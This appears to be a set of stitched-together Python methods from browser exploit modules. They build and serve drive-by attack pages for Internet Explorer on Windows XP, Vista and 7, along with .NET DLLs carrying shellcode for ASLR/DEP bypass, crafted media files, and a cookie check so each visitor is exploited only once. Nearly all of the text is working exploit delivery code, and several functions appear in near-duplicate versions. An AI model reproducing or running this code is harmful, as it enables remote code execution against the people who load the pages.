def makefile(self, clientheader): """Makes the actual bad html file to trigger the buffer overflow""" if "exploit.dll" in clientheader.URL: self.log("SENDING .NET DLL...................") from pelib import PElib p = PElib() """ 438242F4 8B08 MOV ECX,DWORD PTR DS:[EAX] ; EAX=41414141 438242F6 57 PUSH EDI 438242F7 50 PUSH EAX 438242F8 FF91 84000000 CALL DWORD PTR DS:[ECX+84] ; ECX = 414140C1 """ return p.createDotNETPEFileBuf("\xC1\x40\x41\x41" + "\x49\x41\x41\x41" + self.createShellcode(), 0x41414141) else: self.log("SENDING HTML...................") import random html = """ <html> <body> <script> document.write("<object classid='%dexploit.dll#exploit.Shellcode'></object><XML ID=I><X><C><![CDATA[<image SRC=http://䅁䅁.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><HTML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN></HTML>"); </script> </body> </html> """%(random.randint(0,65535)) return html
def makesploit(self, clientheader, clientbody): from libs.spkproxy import header, body h = header('SERVER') b = body() # .NET DLL request if clientheader.URL.count("d2.dll"): self.log("Sending .NET DLL file") p = PElib() sploitstring = p.createDotNETPEFileBuf( ("\x90" * 0xd000) + self.createShellcode(), 0x74000000) h.addHeader('Content-Type', 'application/octet-stream') b.setBody(sploitstring) # AVI file request elif clientheader.URL.count(self.avifile): self.log("Sending AVI file") f = open( os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_directshow/" + self.avifile, "rb") sploitstring = f.read() f.close() h.addHeader('Content-Type', 'application/octet-stream') b.setBody(sploitstring) # Index file request else: sploitstring = self.makefile() h.addHeader('Content-Type', 'text/html') b.setBody(sploitstring) return h, b
def makefileIE7_part2(self): # Exploit for Windows Vista IE 7 # This part returns the created .net dll # .Net DLL ASLR/DEP Bypass p = PElib() filedata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) return filedata
def run(self): if (self.version == 0): filedata=self.makefile('','Windows XP') dlldata ="" elif (self.version ==1): filedata=self.makefile('MSIE 7.0','') self.vProtect = True # Needed for this type of payload p = PElib() dlldata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) self.vProtect = False # Reset this elif (self.version ==2): filedata=self.makefile('MSIE 8.0','') p = PElib() dlldata = p.createDotNETPEFileBuf("", self.pc) outputfile = wp_outputpath(self.filename) self.log("WP> Opening %s"%outputfile ) fd=file(outputfile,'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s'%outputfile) if dlldata != "": dllfile = wp_outputpath(self.filename.replace('html','dll')) # create the dll file f = open(dllfile,'wb') f.write(dlldata) f.flush() f.close self.log('WP> Created DLL file %s'%dllfile) return 1
def makefile(self, clientheader): if self.dllfile in clientheader.URL: self.log('[+] Sending .NET DLL') p = PElib() return p.createDotNETPEFileBuf(self.createShellcode(), self.pc) elif self.wavfile in clientheader.URL: self.log('[+] Sending WAV file') return self.generate_wav() else: self.log('[+] Sending HTML file') html = """<html> <body> <OBJECT CLASSID='%d%s#exploit.Shellcode'></OBJECT> <EMBED src="%s" autostart=true loop=false volume=100 hidden=true> <NOEMBED> <BGSOUND src="%s"> </NOEMBED> </body> </html>""" % (random.randint(0, 65535), self.dllfile, self.wavfile, self.wavfile) return html
def makefile(self, clientheader): if self.dllfile in clientheader.URL: self.log('[+] Sending .NET DLL') p = PElib() return p.createDotNETPEFileBuf(self.createShellcode(), self.pc) elif self.wmafile in clientheader.URL: self.log('[+] Sending ASF file') wma = '' try: fd = open(self.wmasrc, 'rb') wma = fd.read() fd.close() except: self.log('[-] Could not read ASF file!') return wma else: self.log('[+] Sending HTML file') html = """<html> <body> <OBJECT CLASSID='%d%s#exploit.Shellcode'></OBJECT> <OBJECT ID="MediaPlayer" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab# Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..." TYPE="application/x-oleobject" width="280" height="46"> <param name="fileName" value="%s"> <param name="animationatStart" value="true"> <param name="transparentatStart" value="true"> <param name="autoStart" value="true"> <param name="showControls" value="true"> <param name="Volume" value="-300"> <embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" src="%s" name="MediaPlayer" width=280 height=46 autostart=1 showcontrols=1 volume=-300> </OBJECT> </body> </html>""" % (random.randint(0, 65535), self.dllfile, self.wmafile, self.wmafile) return html
def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') #self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit html file') data = self.makefile(browser, osversion) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('.dll')): if browser == "MSIE 7.0": self.log('WP> Serving IE7 .Net DLL file') self.vProtect = True # Needed for this type of payload p = PElib() data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) self.vProtect = False # Reset this else: self.log('WP> Serving IE8 .Net DLL file') p = PElib() data = p.createDotNETPEFileBuf("", self.pc) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'application/octet-stream') else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') self.log('WP> ****************************************') return h, b
def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) cookies = clientheader.getStrValue(['Cookie']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') #self.log('WP> User agent of connecting host: %s' % user_agent) #self.log('WP> Cookies of connecting host: %s' % cookies) if clientheader.URL.count(self.filename): if cookies.count("SessionID"): self.log('WP> Exploit already sent to this client') self.log('WP> Returning blank page') data = "" else: self.log('WP> Serving exploit html file') data = self.makefile(browser, osversion) b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('.dll')): p = PElib() if browser == "MSIE 7.0": self.log('WP> Serving IE7 .Net DLL file') self.vProtect = True # Needed for this type of payload data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) self.vProtect = False # Reset this else: self.log('WP> Serving IE8 .Net DLL file') data = p.createDotNETPEFileBuf("", self.pc) b.setBody(data) h.addHeader('Content-Type', 'application/octet-stream') elif (clientheader.URL.count('.2.html')): if cookies.count("SessionID2"): self.log('WP> Exploit already sent to this client') self.log('WP> Returning blank page') data = "" else: self.log('WP> Serving exploit secondary file') if browser == "MSIE 7.0": data = self.makefileIE7(2) else: data = self.makefileIE8_VistaWin7(2) b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID2=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('iexplore.exe.config')): self.log('WP> Returning blank page') b.setBody("") h.addHeader('Content-Type', 'text/html') elif (clientheader.URL.count('jreVerify.class')): self.log('WP> Returning blank page') b.setBody("") h.addHeader('Content-Type', 'text/html') elif (clientheader.URL.count('favicon.ico')): self.log('WP> Returning blank page') b.setBody("") h.addHeader('Content-Type', 'text/html') else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') self.log('WP> ****************************************') return h, b